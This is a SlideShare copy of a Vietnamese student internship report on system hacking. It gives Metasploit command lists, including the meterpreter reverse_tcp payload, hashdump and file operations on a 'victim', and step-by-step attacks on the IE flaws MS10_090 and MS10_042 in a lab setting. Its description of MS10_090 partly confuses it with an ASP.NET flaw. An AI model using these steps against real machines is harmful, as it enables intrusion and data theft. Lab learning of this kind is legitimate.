SlideShare a Scribd company logo
1 of 12
BÁO CÁO THỰC TẬP TUẦN 2
(Từ ngày 20/5/2015-27/5/2015)
ĐỀ TÀI: SYSTEM HACKING
Giáo viên hướng dẫn: Thầy VÕ ĐỖ THẮNG
Sinh viên thực hiện: TRẦN ĐĂNG KHOA
MỤC LỤC
I. Làm quen các câu lệnh cơ bản thường dùng trong BackTrack 5 :.............................................1
1. Câu lệnhsử dụng để tấn công:...............................................................................................1
2. Câu lệnhsử dụng để điều khiển và khai thác dữ liệu:............................................................1
II. Khai thác các lỗ hổng bảo mật:..............................................................................................2
1. Lỗ hổng MS10_090:...............................................................................................................2
2. Lỗ hổng MS10_042:...............................................................................................................6
1
I. Làm quen các câu lệnh cơ bản thường dùng trong BackTrack 5 :
1. Câu lệnh sử dụng để tấn công:
- #Username:root/password:toor : Thông tin đăng nhập
- #Startx : vào giao diện đồ họa
- #Dhclient –r : xóa thông số IP của máy
- #Dhclient eth0 : xin lại IP cho card eth0
- #Msfconsole : khởi động metasploit
- >Search xxx : tìm kiếm lỗ hổng xxx
- >Use x/y/z : sử dụng module , x/y/z là đường dẫn matching module
- >Show options : kiểm tra các thuộc tính của mã lỗi.
- >Set srvhost A : A là IP máy backtrack
- >Set lhost A
- >Set lport B : B là port muốn mở, B phải khác các port của hệ thống
- >Set payload windows/meterpreter/reverse_tcp
- >Exploit : tiêm mã độc.
- >Set filename abc : chỉnh tên file thành abc
- >sessions –i x : chiếm quyền điều khiển máy nạn nhân , x là id sessions
máy nạn nhân.
2. Câu lệnh sử dụng để điều khiển và khai thác dữ liệu:
- >getuid : xem thông tin hệ thống
- >sysinfo : xem thông tin hệ thống
- >upload /root/Desktop/abc.doc C:/ : tải file abc.doc từ máy backtrack
qua ổ C máy nạn nhân
- >download C:/xyz.doc /root/Desktop : tải file xyz.doc từ máy nạn nhân
về máy backtrack
- >haskdump : lấy hashpass
- >shell : khám phá ổ đĩa máy nạn nhân
- >cd C: : chuyển dấu nhắc ổ đĩa
- >dir : liệt kê tài nguyên trong ổ C
- >md abc : tạo thư mục abc trong ổ C
- >rd abc : xóa thư mục abc trong ổ C
- >del abc.txt : xóa file abc.txt trong ổ C
- >exit : thoát.
2
II. Khai thác các lỗ hổng bảo mật:
1. Lỗ hổng MS10_090:
a. Giới thiệu:
Các phiên bản Microsoft Internet Explorer 6, 7, and 8 cho phép kẻ tấn
công thực hiện mã lệnh thông qua Cascading Style Sheets (CSS)
Lỗi này nằm trong cơ chế thực hiện mã hóa phiên làm việc của ứng
dụng web ASP.NET, dẫn tới việc kẻ tấn công có thể thăm dò để tìm ra
khóa giải mã trong một thời gian ngắn.
b. Cách thức tấn công:
Bước 1: khởi động metasploit
3
Bước 2: tìm kiếm module ms10_090
Bước 3: sử dụng module này
Bước 4: thiết lập các thuộc tính cần thiết
4
Set các giá trị thuộc tính cần thiết
Bước 5: tiêm nhiễm
Bước 6: lấy quyền điều khiển và xem các thông tin trên winxp
Ta tiếnhành copy URL gửi qua cho máy nạn nhân. khi nạn nhân truy cập vào địa
chỉ này thì máy backtrack sẽ chiếm được quyền điều khiển của máy nạn nhân
5
Ta nhận thấy giữa máy nạn nhân và máy attacker đã thiết lập một phiên làm việc có
ID là 1. Ta tiến hành thực thi quyền điều khiển trong sessionnày
Xem thông tinmáy xp:
Ngoài ra ta còn có thể toàn quyền thao tác trên máy nạn nhân như copy file, tải
file,…
6
2. Lỗ hổng MS10_042:
a. Giới thiệu:
Lỗ hổng bảo mật trong “Help and Support Center” có thể cho phép thực
hiện mã lệnh từ xa (2229593)
Mã lỗi được thực thi khi người dùng xem một trang web thiết kế đặc
biệt bằng cách sử dụng một trình duyệt web hoặc nhấp vào một liên kết
thiết kế đặc biệt trong thông báo email.
b. Cách thức tấn công:
Bước 1: khởi động metasploit
7
Bước 2: tìm kiếm module ms10_042
Bước 3: sử dụng module này
Bước 4: thiết lập các thuộc tính cần thiết
8
Bước 5: tiêm nhiễm
Bước 6: lấy quyền điều khiển và xem các thông tin trên win xp
Gửi linkqua máy nạn nhân, khi nạn nhân truy cập vào địa chỉ trên bằng IE và mở
help center lên. Khi đó máy nạn nhân sẽ bị điều khiển.
9
Chiếm quyền điều khiển máy nạn nhân, xem thông tinmáy nạn nhân
Ngoài ra ta còn có thể thực hiện toàn quyền trên máy nạn nhân.
10

More Related Content

What's hot

Tạo mã độc trên kali linux để xâm nhập android (mạng lan )
Tạo mã độc trên kali linux để xâm nhập android (mạng lan )Tạo mã độc trên kali linux để xâm nhập android (mạng lan )
Tạo mã độc trên kali linux để xâm nhập android (mạng lan )Trọng An
 
Tạo mã độc trên vps để xâm nhập android ( môi trường internet )
Tạo mã độc trên vps để xâm nhập android ( môi trường internet  )Tạo mã độc trên vps để xâm nhập android ( môi trường internet  )
Tạo mã độc trên vps để xâm nhập android ( môi trường internet )Trọng An
 
Report athena week 1
Report athena week 1Report athena week 1
Report athena week 1Liên Hán
 
Báo cáo đề tài 5
Báo cáo đề tài 5Báo cáo đề tài 5
Báo cáo đề tài 5Chuc Thanh
 
Bao cao thuc tap tuan 1 Athena Tran Dang Khoa
Bao cao thuc tap tuan 1 Athena Tran Dang KhoaBao cao thuc tap tuan 1 Athena Tran Dang Khoa
Bao cao thuc tap tuan 1 Athena Tran Dang KhoaÂu Dương Bình
 
Xâm nhập điện thoại android qua vps trên internet
Xâm nhập điện thoại android qua vps trên internetXâm nhập điện thoại android qua vps trên internet
Xâm nhập điện thoại android qua vps trên internetthach28
 
Loi baomat windows(f)
Loi baomat windows(f)Loi baomat windows(f)
Loi baomat windows(f)Huy Tiến
 
Report athena week 1
Report athena week 1Report athena week 1
Report athena week 1Liên Hán
 
Report athena week 1
Report athena week 1Report athena week 1
Report athena week 1Liên Hán
 
Slide Báo cáo thực tập athena
Slide Báo cáo thực tập athenaSlide Báo cáo thực tập athena
Slide Báo cáo thực tập athenaCon Ranh
 
Hướng dẫn cài đặt kali linux trên máy ảo vmware.docx
Hướng dẫn cài đặt kali linux trên máy ảo vmware.docxHướng dẫn cài đặt kali linux trên máy ảo vmware.docx
Hướng dẫn cài đặt kali linux trên máy ảo vmware.docxLê Lãnh
 
Khai thác lỗi phần mềm thi chứng chỉ của Microsoft - Phạm Đình Thắng
Khai thác lỗi phần mềm thi chứng chỉ của Microsoft - Phạm Đình ThắngKhai thác lỗi phần mềm thi chứng chỉ của Microsoft - Phạm Đình Thắng
Khai thác lỗi phần mềm thi chứng chỉ của Microsoft - Phạm Đình ThắngSecurity Bootcamp
 
Cách tạo mã độc trên kali linux và triển khai trên android ảo
Cách tạo mã độc trên kali linux và triển khai trên android ảoCách tạo mã độc trên kali linux và triển khai trên android ảo
Cách tạo mã độc trên kali linux và triển khai trên android ảothach28
 
Vũ Thanh Hiếu tạo mã độc trên kali linux để xâm nhập android
Vũ Thanh Hiếu   tạo mã độc trên kali linux để xâm nhập androidVũ Thanh Hiếu   tạo mã độc trên kali linux để xâm nhập android
Vũ Thanh Hiếu tạo mã độc trên kali linux để xâm nhập androidAnh Hiếu
 
Google chrome os (perfect version)
Google chrome os (perfect version)Google chrome os (perfect version)
Google chrome os (perfect version)En Tj Pj
 
Slide báo cáo: System Hacking
Slide báo cáo: System HackingSlide báo cáo: System Hacking
Slide báo cáo: System HackingHuynh Khang
 

What's hot (20)

Tạo mã độc trên kali linux để xâm nhập android (mạng lan )
Tạo mã độc trên kali linux để xâm nhập android (mạng lan )Tạo mã độc trên kali linux để xâm nhập android (mạng lan )
Tạo mã độc trên kali linux để xâm nhập android (mạng lan )
 
Bao caocuoiki
Bao caocuoikiBao caocuoiki
Bao caocuoiki
 
Tạo mã độc trên vps để xâm nhập android ( môi trường internet )
Tạo mã độc trên vps để xâm nhập android ( môi trường internet  )Tạo mã độc trên vps để xâm nhập android ( môi trường internet  )
Tạo mã độc trên vps để xâm nhập android ( môi trường internet )
 
Report athena week 1
Report athena week 1Report athena week 1
Report athena week 1
 
Báo cáo đề tài 5
Báo cáo đề tài 5Báo cáo đề tài 5
Báo cáo đề tài 5
 
Bao cao thuc tap tuan 1 Athena Tran Dang Khoa
Bao cao thuc tap tuan 1 Athena Tran Dang KhoaBao cao thuc tap tuan 1 Athena Tran Dang Khoa
Bao cao thuc tap tuan 1 Athena Tran Dang Khoa
 
Xâm nhập điện thoại android qua vps trên internet
Xâm nhập điện thoại android qua vps trên internetXâm nhập điện thoại android qua vps trên internet
Xâm nhập điện thoại android qua vps trên internet
 
Loi baomat windows(f)
Loi baomat windows(f)Loi baomat windows(f)
Loi baomat windows(f)
 
Report athena week 1
Report athena week 1Report athena week 1
Report athena week 1
 
Report athena week 1
Report athena week 1Report athena week 1
Report athena week 1
 
Baocaocuoiki
BaocaocuoikiBaocaocuoiki
Baocaocuoiki
 
Slide Báo cáo thực tập athena
Slide Báo cáo thực tập athenaSlide Báo cáo thực tập athena
Slide Báo cáo thực tập athena
 
Hướng dẫn cài đặt kali linux trên máy ảo vmware.docx
Hướng dẫn cài đặt kali linux trên máy ảo vmware.docxHướng dẫn cài đặt kali linux trên máy ảo vmware.docx
Hướng dẫn cài đặt kali linux trên máy ảo vmware.docx
 
Athena tuần 5
Athena tuần 5Athena tuần 5
Athena tuần 5
 
Bc athena cuoi ky
Bc athena cuoi kyBc athena cuoi ky
Bc athena cuoi ky
 
Khai thác lỗi phần mềm thi chứng chỉ của Microsoft - Phạm Đình Thắng
Khai thác lỗi phần mềm thi chứng chỉ của Microsoft - Phạm Đình ThắngKhai thác lỗi phần mềm thi chứng chỉ của Microsoft - Phạm Đình Thắng
Khai thác lỗi phần mềm thi chứng chỉ của Microsoft - Phạm Đình Thắng
 
Cách tạo mã độc trên kali linux và triển khai trên android ảo
Cách tạo mã độc trên kali linux và triển khai trên android ảoCách tạo mã độc trên kali linux và triển khai trên android ảo
Cách tạo mã độc trên kali linux và triển khai trên android ảo
 
Vũ Thanh Hiếu tạo mã độc trên kali linux để xâm nhập android
Vũ Thanh Hiếu   tạo mã độc trên kali linux để xâm nhập androidVũ Thanh Hiếu   tạo mã độc trên kali linux để xâm nhập android
Vũ Thanh Hiếu tạo mã độc trên kali linux để xâm nhập android
 
Google chrome os (perfect version)
Google chrome os (perfect version)Google chrome os (perfect version)
Google chrome os (perfect version)
 
Slide báo cáo: System Hacking
Slide báo cáo: System HackingSlide báo cáo: System Hacking
Slide báo cáo: System Hacking
 

Viewers also liked

Bao cao thuc tap nguyen hoai huy
Bao cao thuc tap   nguyen hoai huyBao cao thuc tap   nguyen hoai huy
Bao cao thuc tap nguyen hoai huyhoaihuysc
 
BAO CAO THUC TAP TAI ATHENA
BAO CAO THUC TAP TAI ATHENABAO CAO THUC TAP TAI ATHENA
BAO CAO THUC TAP TAI ATHENAStephen Le
 
Bao coa thuc tap
Bao coa thuc tapBao coa thuc tap
Bao coa thuc taphienducdoan
 
bai bao cao thuc tap 2
bai bao cao thuc tap 2bai bao cao thuc tap 2
bai bao cao thuc tap 2Minh Hoang
 
Bao cao thuc tap tuan 1
Bao cao thuc tap tuan 1Bao cao thuc tap tuan 1
Bao cao thuc tap tuan 1TranQuangChien
 
Bao cao-thuc-tap-tong-hop-thái hòa
Bao cao-thuc-tap-tong-hop-thái hòaBao cao-thuc-tap-tong-hop-thái hòa
Bao cao-thuc-tap-tong-hop-thái hòaLan Te
 
bao cao thuc tap tai Athena
bao cao thuc tap tai Athenabao cao thuc tap tai Athena
bao cao thuc tap tai Athenangothithanhhuong
 
Book study 10주차_4조
Book study 10주차_4조Book study 10주차_4조
Book study 10주차_4조홍일 김
 
9주차 book 2조_민슬기송치성김자영
9주차 book 2조_민슬기송치성김자영9주차 book 2조_민슬기송치성김자영
9주차 book 2조_민슬기송치성김자영홍일 김
 
Cbr sprdsht v10xls.xls
Cbr sprdsht v10xls.xlsCbr sprdsht v10xls.xls
Cbr sprdsht v10xls.xlschrissybooboo
 
Presentation mom en anglais 2013
Presentation mom en anglais 2013Presentation mom en anglais 2013
Presentation mom en anglais 2013malabat
 
Perceptions of the customers towards insurance companies in bangladesh a stud...
Perceptions of the customers towards insurance companies in bangladesh a stud...Perceptions of the customers towards insurance companies in bangladesh a stud...
Perceptions of the customers towards insurance companies in bangladesh a stud...Asif Islam
 
Bao cao thuc tap tai athena
Bao cao thuc tap tai athenaBao cao thuc tap tai athena
Bao cao thuc tap tai athenanganathena
 
9주차 book 3조_김남욱나사랑임혜진
9주차 book 3조_김남욱나사랑임혜진9주차 book 3조_김남욱나사랑임혜진
9주차 book 3조_김남욱나사랑임혜진홍일 김
 
사용자경험 스케치 _ Book study 7주차 5조
사용자경험 스케치 _ Book study 7주차 5조사용자경험 스케치 _ Book study 7주차 5조
사용자경험 스케치 _ Book study 7주차 5조홍일 김
 
[123doc.vn] thiet ke mang lan cho truong hoc copy
[123doc.vn]   thiet ke mang lan cho truong hoc copy[123doc.vn]   thiet ke mang lan cho truong hoc copy
[123doc.vn] thiet ke mang lan cho truong hoc copynenohap
 
Book study 10주차 5조
Book study 10주차 5조Book study 10주차 5조
Book study 10주차 5조홍일 김
 
6 8 prestacion desempleo
6 8 prestacion desempleo6 8 prestacion desempleo
6 8 prestacion desempleosupervegallevis
 
Hướng dẫn báo cáo tốt nghiệp viện đại học TOPICA
Hướng dẫn báo cáo tốt nghiệp viện đại học TOPICAHướng dẫn báo cáo tốt nghiệp viện đại học TOPICA
Hướng dẫn báo cáo tốt nghiệp viện đại học TOPICADương Hà
 

Viewers also liked (20)

Bao cao thuc tap nguyen hoai huy
Bao cao thuc tap   nguyen hoai huyBao cao thuc tap   nguyen hoai huy
Bao cao thuc tap nguyen hoai huy
 
BAO CAO THUC TAP TAI ATHENA
BAO CAO THUC TAP TAI ATHENABAO CAO THUC TAP TAI ATHENA
BAO CAO THUC TAP TAI ATHENA
 
Bao coa thuc tap
Bao coa thuc tapBao coa thuc tap
Bao coa thuc tap
 
bai bao cao thuc tap 2
bai bao cao thuc tap 2bai bao cao thuc tap 2
bai bao cao thuc tap 2
 
Bao cao thuc tap tuan 1
Bao cao thuc tap tuan 1Bao cao thuc tap tuan 1
Bao cao thuc tap tuan 1
 
Bao cao-thuc-tap-tong-hop-thái hòa
Bao cao-thuc-tap-tong-hop-thái hòaBao cao-thuc-tap-tong-hop-thái hòa
Bao cao-thuc-tap-tong-hop-thái hòa
 
bao cao thuc tap tai Athena
bao cao thuc tap tai Athenabao cao thuc tap tai Athena
bao cao thuc tap tai Athena
 
Book study 10주차_4조
Book study 10주차_4조Book study 10주차_4조
Book study 10주차_4조
 
9주차 book 2조_민슬기송치성김자영
9주차 book 2조_민슬기송치성김자영9주차 book 2조_민슬기송치성김자영
9주차 book 2조_민슬기송치성김자영
 
Bao cao thuc tap athena
Bao cao thuc tap athenaBao cao thuc tap athena
Bao cao thuc tap athena
 
Cbr sprdsht v10xls.xls
Cbr sprdsht v10xls.xlsCbr sprdsht v10xls.xls
Cbr sprdsht v10xls.xls
 
Presentation mom en anglais 2013
Presentation mom en anglais 2013Presentation mom en anglais 2013
Presentation mom en anglais 2013
 
Perceptions of the customers towards insurance companies in bangladesh a stud...
Perceptions of the customers towards insurance companies in bangladesh a stud...Perceptions of the customers towards insurance companies in bangladesh a stud...
Perceptions of the customers towards insurance companies in bangladesh a stud...
 
Bao cao thuc tap tai athena
Bao cao thuc tap tai athenaBao cao thuc tap tai athena
Bao cao thuc tap tai athena
 
9주차 book 3조_김남욱나사랑임혜진
9주차 book 3조_김남욱나사랑임혜진9주차 book 3조_김남욱나사랑임혜진
9주차 book 3조_김남욱나사랑임혜진
 
사용자경험 스케치 _ Book study 7주차 5조
사용자경험 스케치 _ Book study 7주차 5조사용자경험 스케치 _ Book study 7주차 5조
사용자경험 스케치 _ Book study 7주차 5조
 
[123doc.vn] thiet ke mang lan cho truong hoc copy
[123doc.vn]   thiet ke mang lan cho truong hoc copy[123doc.vn]   thiet ke mang lan cho truong hoc copy
[123doc.vn] thiet ke mang lan cho truong hoc copy
 
Book study 10주차 5조
Book study 10주차 5조Book study 10주차 5조
Book study 10주차 5조
 
6 8 prestacion desempleo
6 8 prestacion desempleo6 8 prestacion desempleo
6 8 prestacion desempleo
 
Hướng dẫn báo cáo tốt nghiệp viện đại học TOPICA
Hướng dẫn báo cáo tốt nghiệp viện đại học TOPICAHướng dẫn báo cáo tốt nghiệp viện đại học TOPICA
Hướng dẫn báo cáo tốt nghiệp viện đại học TOPICA
 

Similar to Bao cao thuc tap tuan 2

Báo cáo system hacking
Báo cáo system hackingBáo cáo system hacking
Báo cáo system hackingHuynh Khang
 
INT1484-Bai-thuc-hanh-01.pdf
INT1484-Bai-thuc-hanh-01.pdfINT1484-Bai-thuc-hanh-01.pdf
INT1484-Bai-thuc-hanh-01.pdfPhamTruongGiang4
 
cài đặt metasploit
cài đặt metasploitcài đặt metasploit
cài đặt metasploitLê Lãnh
 
Tuan vq bao cao thuc tap_ system hacking
Tuan vq bao cao thuc tap_ system hackingTuan vq bao cao thuc tap_ system hacking
Tuan vq bao cao thuc tap_ system hackingv7q3t
 
Cấu hình và bảo mật cho Ubuntu Server
Cấu hình và bảo mật cho Ubuntu Server Cấu hình và bảo mật cho Ubuntu Server
Cấu hình và bảo mật cho Ubuntu Server Ho Quang Thanh
 
Aircrack-ng.pdf
Aircrack-ng.pdfAircrack-ng.pdf
Aircrack-ng.pdfHongoHuy
 
[Kmasecurity.net] ksec club-hirrent's boot-cd
[Kmasecurity.net] ksec club-hirrent's boot-cd[Kmasecurity.net] ksec club-hirrent's boot-cd
[Kmasecurity.net] ksec club-hirrent's boot-cdVu Trung Kien
 
ceh-lab_book_tieng_viet_phan3
ceh-lab_book_tieng_viet_phan3ceh-lab_book_tieng_viet_phan3
ceh-lab_book_tieng_viet_phan3VNG
 
Trend micro kết quả thử nghiêm đhyd
Trend micro kết quả thử nghiêm đhydTrend micro kết quả thử nghiêm đhyd
Trend micro kết quả thử nghiêm đhydlaonap166
 
Tai lieu huong_dan_su_dung_backtrack_5_2524
Tai lieu huong_dan_su_dung_backtrack_5_2524Tai lieu huong_dan_su_dung_backtrack_5_2524
Tai lieu huong_dan_su_dung_backtrack_5_2524Ngô Đăng Tân
 
Slide báo cáo cuối kì system hacking-Trần Nguyễn Lộc
Slide báo cáo cuối kì system hacking-Trần Nguyễn LộcSlide báo cáo cuối kì system hacking-Trần Nguyễn Lộc
Slide báo cáo cuối kì system hacking-Trần Nguyễn LộcLoc Tran
 
các bước hack server
các bước hack servercác bước hack server
các bước hack servertruong le hung
 
TÌM HIỂU VỀ METASPLOIT TRONG KALI LINUX - Thái Tuấn
TÌM HIỂU VỀ METASPLOIT TRONG KALI LINUX - Thái TuấnTÌM HIỂU VỀ METASPLOIT TRONG KALI LINUX - Thái Tuấn
TÌM HIỂU VỀ METASPLOIT TRONG KALI LINUX - Thái TuấnThái Tuấn Lưu
 

Similar to Bao cao thuc tap tuan 2 (20)

Báo cáo system hacking
Báo cáo system hackingBáo cáo system hacking
Báo cáo system hacking
 
Bai bao cao 3
Bai bao cao 3Bai bao cao 3
Bai bao cao 3
 
INT1484-Bai-thuc-hanh-01.pdf
INT1484-Bai-thuc-hanh-01.pdfINT1484-Bai-thuc-hanh-01.pdf
INT1484-Bai-thuc-hanh-01.pdf
 
cài đặt metasploit
cài đặt metasploitcài đặt metasploit
cài đặt metasploit
 
Tuan vq bao cao thuc tap_ system hacking
Tuan vq bao cao thuc tap_ system hackingTuan vq bao cao thuc tap_ system hacking
Tuan vq bao cao thuc tap_ system hacking
 
Cấu hình và bảo mật cho Ubuntu Server
Cấu hình và bảo mật cho Ubuntu Server Cấu hình và bảo mật cho Ubuntu Server
Cấu hình và bảo mật cho Ubuntu Server
 
Aircrack-ng.pdf
Aircrack-ng.pdfAircrack-ng.pdf
Aircrack-ng.pdf
 
[Kmasecurity.net] ksec club-hirrent's boot-cd
[Kmasecurity.net] ksec club-hirrent's boot-cd[Kmasecurity.net] ksec club-hirrent's boot-cd
[Kmasecurity.net] ksec club-hirrent's boot-cd
 
Ceh phan3
Ceh phan3Ceh phan3
Ceh phan3
 
ceh-lab_book_tieng_viet_phan3
ceh-lab_book_tieng_viet_phan3ceh-lab_book_tieng_viet_phan3
ceh-lab_book_tieng_viet_phan3
 
Tuan5
Tuan5Tuan5
Tuan5
 
Kali Linux
Kali LinuxKali Linux
Kali Linux
 
Bai bao cao 4
Bai bao cao 4Bai bao cao 4
Bai bao cao 4
 
Trend micro kết quả thử nghiêm đhyd
Trend micro kết quả thử nghiêm đhydTrend micro kết quả thử nghiêm đhyd
Trend micro kết quả thử nghiêm đhyd
 
Tai lieu huong_dan_su_dung_backtrack_5_2524
Tai lieu huong_dan_su_dung_backtrack_5_2524Tai lieu huong_dan_su_dung_backtrack_5_2524
Tai lieu huong_dan_su_dung_backtrack_5_2524
 
Slide báo cáo cuối kì system hacking-Trần Nguyễn Lộc
Slide báo cáo cuối kì system hacking-Trần Nguyễn LộcSlide báo cáo cuối kì system hacking-Trần Nguyễn Lộc
Slide báo cáo cuối kì system hacking-Trần Nguyễn Lộc
 
Linux Introduction
Linux IntroductionLinux Introduction
Linux Introduction
 
các bước hack server
các bước hack servercác bước hack server
các bước hack server
 
Cac buochackserver
Cac buochackserverCac buochackserver
Cac buochackserver
 
TÌM HIỂU VỀ METASPLOIT TRONG KALI LINUX - Thái Tuấn
TÌM HIỂU VỀ METASPLOIT TRONG KALI LINUX - Thái TuấnTÌM HIỂU VỀ METASPLOIT TRONG KALI LINUX - Thái Tuấn
TÌM HIỂU VỀ METASPLOIT TRONG KALI LINUX - Thái Tuấn
 

Bao cao thuc tap tuan 2

  • 1. BÁO CÁO THỰC TẬP TUẦN 2 (Từ ngày 20/5/2015-27/5/2015) ĐỀ TÀI: SYSTEM HACKING Giáo viên hướng dẫn: Thầy VÕ ĐỖ THẮNG Sinh viên thực hiện: TRẦN ĐĂNG KHOA
  • 2. MỤC LỤC I. Làm quen các câu lệnh cơ bản thường dùng trong BackTrack 5 :.............................................1 1. Câu lệnhsử dụng để tấn công:...............................................................................................1 2. Câu lệnhsử dụng để điều khiển và khai thác dữ liệu:............................................................1 II. Khai thác các lỗ hổng bảo mật:..............................................................................................2 1. Lỗ hổng MS10_090:...............................................................................................................2 2. Lỗ hổng MS10_042:...............................................................................................................6
  • 3. 1 I. Làm quen các câu lệnh cơ bản thường dùng trong BackTrack 5 : 1. Câu lệnh sử dụng để tấn công: - #Username:root/password:toor : Thông tin đăng nhập - #Startx : vào giao diện đồ họa - #Dhclient –r : xóa thông số IP của máy - #Dhclient eth0 : xin lại IP cho card eth0 - #Msfconsole : khởi động metasploit - >Search xxx : tìm kiếm lỗ hổng xxx - >Use x/y/z : sử dụng module , x/y/z là đường dẫn matching module - >Show options : kiểm tra các thuộc tính của mã lỗi. - >Set srvhost A : A là IP máy backtrack - >Set lhost A - >Set lport B : B là port muốn mở, B phải khác các port của hệ thống - >Set payload windows/meterpreter/reverse_tcp - >Exploit : tiêm mã độc. - >Set filename abc : chỉnh tên file thành abc - >sessions –i x : chiếm quyền điều khiển máy nạn nhân , x là id sessions máy nạn nhân. 2. Câu lệnh sử dụng để điều khiển và khai thác dữ liệu: - >getuid : xem thông tin hệ thống - >sysinfo : xem thông tin hệ thống - >upload /root/Desktop/abc.doc C:/ : tải file abc.doc từ máy backtrack qua ổ C máy nạn nhân - >download C:/xyz.doc /root/Desktop : tải file xyz.doc từ máy nạn nhân về máy backtrack - >haskdump : lấy hashpass - >shell : khám phá ổ đĩa máy nạn nhân - >cd C: : chuyển dấu nhắc ổ đĩa - >dir : liệt kê tài nguyên trong ổ C - >md abc : tạo thư mục abc trong ổ C - >rd abc : xóa thư mục abc trong ổ C - >del abc.txt : xóa file abc.txt trong ổ C - >exit : thoát.
  • 4. 2 II. Khai thác các lỗ hổng bảo mật: 1. Lỗ hổng MS10_090: a. Giới thiệu: Các phiên bản Microsoft Internet Explorer 6, 7, and 8 cho phép kẻ tấn công thực hiện mã lệnh thông qua Cascading Style Sheets (CSS) Lỗi này nằm trong cơ chế thực hiện mã hóa phiên làm việc của ứng dụng web ASP.NET, dẫn tới việc kẻ tấn công có thể thăm dò để tìm ra khóa giải mã trong một thời gian ngắn. b. Cách thức tấn công: Bước 1: khởi động metasploit
  • 5. 3 Bước 2: tìm kiếm module ms10_090 Bước 3: sử dụng module này Bước 4: thiết lập các thuộc tính cần thiết
  • 6. 4 Set các giá trị thuộc tính cần thiết Bước 5: tiêm nhiễm Bước 6: lấy quyền điều khiển và xem các thông tin trên winxp Ta tiếnhành copy URL gửi qua cho máy nạn nhân. khi nạn nhân truy cập vào địa chỉ này thì máy backtrack sẽ chiếm được quyền điều khiển của máy nạn nhân
  • 7. 5 Ta nhận thấy giữa máy nạn nhân và máy attacker đã thiết lập một phiên làm việc có ID là 1. Ta tiến hành thực thi quyền điều khiển trong sessionnày Xem thông tinmáy xp: Ngoài ra ta còn có thể toàn quyền thao tác trên máy nạn nhân như copy file, tải file,…
  • 8. 6 2. Lỗ hổng MS10_042: a. Giới thiệu: Lỗ hổng bảo mật trong “Help and Support Center” có thể cho phép thực hiện mã lệnh từ xa (2229593) Mã lỗi được thực thi khi người dùng xem một trang web thiết kế đặc biệt bằng cách sử dụng một trình duyệt web hoặc nhấp vào một liên kết thiết kế đặc biệt trong thông báo email. b. Cách thức tấn công: Bước 1: khởi động metasploit
  • 9. 7 Bước 2: tìm kiếm module ms10_042 Bước 3: sử dụng module này Bước 4: thiết lập các thuộc tính cần thiết
  • 10. 8 Bước 5: tiêm nhiễm Bước 6: lấy quyền điều khiển và xem các thông tin trên win xp Gửi linkqua máy nạn nhân, khi nạn nhân truy cập vào địa chỉ trên bằng IE và mở help center lên. Khi đó máy nạn nhân sẽ bị điều khiển.
  • 11. 9 Chiếm quyền điều khiển máy nạn nhân, xem thông tinmáy nạn nhân Ngoài ra ta còn có thể thực hiện toàn quyền trên máy nạn nhân.
  • 12. 10